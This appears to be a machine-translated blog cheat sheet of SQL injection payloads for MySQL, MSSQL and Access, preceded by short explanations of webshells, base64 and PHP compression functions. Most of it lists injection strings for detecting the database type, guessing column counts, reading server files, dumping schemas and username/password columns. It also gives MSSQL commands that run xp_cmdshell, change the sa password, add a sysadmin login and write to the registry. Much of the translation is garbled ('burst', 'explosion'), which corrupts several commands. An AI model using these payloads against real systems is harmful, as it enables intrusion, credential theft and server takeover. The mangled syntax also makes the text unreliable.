When your talent
When you can not afford to hang on ambition
Then you should stop learning
I'm looking for someone from the Internet MsSQL summarize some common command injection, and then together, put here to facilitate reference.
Before entering the question to sweep the blind spot, may have friends will have, you can skip
table of Contents
MsSQL common injection command summary
Determine the database type:
Follows
1, webshell
WebShell is in a command presence asp, php, jsp or cgi form of web documents such as the execution environment, it can also be called as a web page back door. After the general, *** r invasion in a website, often in the back door of these asp or php *** files in the web server's directory sites, mixed with normal web files. *** then you can use a web-way through asp or php *** backdoor server control, including uploading and downloading files, view the database, execute arbitrary commands. Dos command or through the backdoor server vulnerabilities, etc. *** purposes by mentioning the right to reach the same server so marginalia other sites.
webshell server can pass through the firewall, due to over-pass port 80 with the server or remote controlled, it will not be blocked by the firewall. And using webshell generally do not leave recorded in the system log, leaving only some of the data submitted records, inexperienced administrators is difficult to see traces of r invasion in a web log site.
2, base64 encoded
Base64 is one of the most common network for the transmission of 8Bit encoding byte code, commonly used in the identification information transmitting longer HTTP environment.
Standard Base64 into the URL is not suitable for direct transmission, since a URL standard Base64 encoder will the "/" and "+" character becomes shaped like a "XX%", and these "%" in the memory the database will also be required to convert again, because ANSI SQL has been in "%" was used as a wildcard.
To solve this problem, the URL may be used for improving Base64 encoding, it is not the end of the filling '=' sign, and the standard Base64 "+" and "/" are changed to "_" and "-" , thus eliminating the conversion at URL codec and database storage to be made, to avoid increasing the length of the coding information in this process, and unified database format, etc. form the object identifier.
3, Php function in base64
base64_encode () function
Action: string to BASE64 encoding.
语法: string base64_encode(string data)。
Return value: String.
Function type: encoding process.
Description: This function will MIME BASE64 encoded string. This encoding allows text or pictures can also be successfully transmitted over the network. After BASE64 encoded string contains only case letters, Arabic numerals, plus the backslash, substantially a total of 64 characters, do not contain other special characters, which thus named BASE64. Encoded string plus about 1/3 than the original length of the string. More information can be encoded BASE64 6.8 RFC2045 documents.
E.g:
<?php
$str = 'This is an encoded string';
echo base64_encode($str);
?>
Base64_decode () function
Effect: the data encoded using MIME base64 decoding.
语法:string base64_decode ( string data)。
Return value: String.
Function type: encoding process.
Description: base64_encode function for decoding encoded string.
E.g:
<?php
$str = 'd2VsbGNvbWUlMjB0byUyMGVyYW5nZSUyMQ== ';
echo base64_decode($str);
?>
4, deflate the correlation function in PHP
DEFLATE simultaneously using LZ77 algorithm and Huffman coding (Huffman Coding) is a lossless data compression algorithm.
gzdeflate () function
Role: the data do DEFLAT coding.
Syntax: string gzdeflate (string data).
Return value: String.
Function type: encoding process.
E.g:
<?php
$compressed = gzdeflate('Compress me', 9);
echo $compressed;
?>
Gzinflate () function
Role: the data do DEFLAT coding.
Syntax: string gzinflate (string data).
Return value: String.
Function type: encoding process.
E.g:
<?php
$compressed = gzdeflate('Compress me', 9);
$uncompressed = gzinflate($compressed);
echo $uncompressed;
?>
MsSQL common injection command summary
judgment database type:
Access:
and (the SELECT the above mentioned id from the MSysAccessObjects)> 0 return to the normal explanation is Access
MSSQL:
and (the SELECT the above mentioned id from sysobjects)> 0 return to the normal explanation is MSSQL
MySQL:
and length (the User ())> 0 return to the normal explanation is MySQL
MySQL:
• 1. Analyzing release and ord (mid (version () , 1,1))> 51 / return instructions are normally above 4.0, the query may be union
• 2. order by using violence field, in the order by adding the URL 10 / If the return to normal instructions field is greater than 10
• 3. reused to query accurately union fields, such as: order by or and 1 = 2 union select 1,2,3, ...... ./* until return to normal, described accurate guess field number. The filter
spaces can be used / * / replaced.
• 4. determine database connection account has not write permission, and (select count () from mysql.user)> 0 / If the results return an error, then we can only guess administrator account and password
yards.
• 5. If the return to normal, it is possible (separated char (ascii file path values with a comma)) by and 1 = 2 union select 1,2,3,4,5,6, load_file, 8,9,10 / Note:
load_file (char (ascii file path values separated by commas)) can also be used in hexadecimal configuration file is read in this way, to find a database connections.
• 6, is not detected as root and / * / the ord (MID (User (), 1,1)) = 114 /
•. 7, MySQL built-in function hex () converts the hexadecimal characters, such as select hex (user ( ))
MySQL built-in function unhex () decoding hexadecimal, such as SELECT unhex (hex (User ()))
•. 8, MySQL built-in function concat () and the combined plurality of columns in a row as select concat (username, 0x3A, password ) t_member from
• 9 built-in functions common use:
the SELECT SYSTEM_USER () View system users
select current_user () to query the current user
select user () to query the user
SELECT version () to query the database version
SELECT database () to query the database currently connected
select @@ version_compile_os inquiry The current operating system
select @@ datadir query reads the database path
select @@ basedir query MYSQL installation path
------------------------------ ----------
remove the limit 1,1 to check out all the lines, the first number represents the first of several inquiries, the second number represents the number of a query
The first number increments from 1 to 3:00 browser query returns an error, indicating the presence of two library / table.
• 10, the number of search database
of Union the SELECT cuncat (schema_name, 0x3A) from information_schema.schemata limit 1,1
• 11, lookup table
union select table_name from information_schema.tables where table_schema = library name limit 1,1
MSSQL:
detecting whether the authority SA
and 1 = (select IS_SrVROLEMEMBER ( ' sysadmin')); -
detecting whether a DB permissions
and 1 = (Select IS_MEMBER ( ' db_owner'))
burst all database union select name from master.dbo.sysdatabases where dbid = 1 1 represents the first library
burst all the tables
• The first table union select top 1 name from the library xtype the WHERE name = .dbo.sysobjects 'U'
• The second table union select top 1 name from the library name. dbo.sysobjects where xtype = 'U' and name not in ( ' first table')
• third table union select top 1 name from the library name .dbo.sysobjects where xtype = 'U' and name not in ( ' The first table ',' second table ')
...
burst columns:
• SELECT ID burst from seay.dbo.sysobjects WHERE ID = xtype' the U-'and name =' ADMIN '
• explosive a column select top 1 name from seay.dbo.syscolumns where id = ID number
• explosion second column select top 1 name from seay.dbo.syscolumns where id = ID number and name not in ( 'first row')
...
burst data:
from select table column names
• master.dbo.xp_dirtree ' c: \ '; traverse directories
• exec master.dbo.xp_availablemedia; - obtaining all current drives
• exec master.dbo.xp_subdirs' c: \' ; - obtain a list of subdirectories
• exec master.dbo.xp_dirtree 'c: \' ; - access to all subdirectories of the directory tree structure
• exec master.dbo.xp_cmdshell 'type c: \ web \ web.config'; - view the contents of a file
backup of the database: backup database library name to disk = 'c: / l . ASP ';
MSSQL built-in functions:
the SELECT @@ version query the database version
select user_name () query the current database connection user name
select db_name () to query the current database name
change sa password
exec sp_password NULL,' new password ',' sa '
Add privileges SA user
exec sp_addlogin 'username', 'pass ', 'master';
exec sp_addsrvrolemember ‘username’, sysadmin
Detecting whether to support multi-line
; declare @d int; -
stopped or activate a service.
master..xp_servicecontrol Exec 'STOP', 'Schedule'
Exec master..xp_servicecontrol 'Start', 'Schedule'
unzipped file.
xp_unpackcab 'c: \ test.cab', 'c: \ temp', 1
Restore the xp_cmdshell
; Exec master..dbo.sp_addextendedproc 'the xp_cmdshell', 'xplog70.dll'; -
open sandbox mode:
Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE \ in the Microsoft \ the Jet \ 4.0 \ Engines', 'SandboxMode', 'REG_DWORD', 1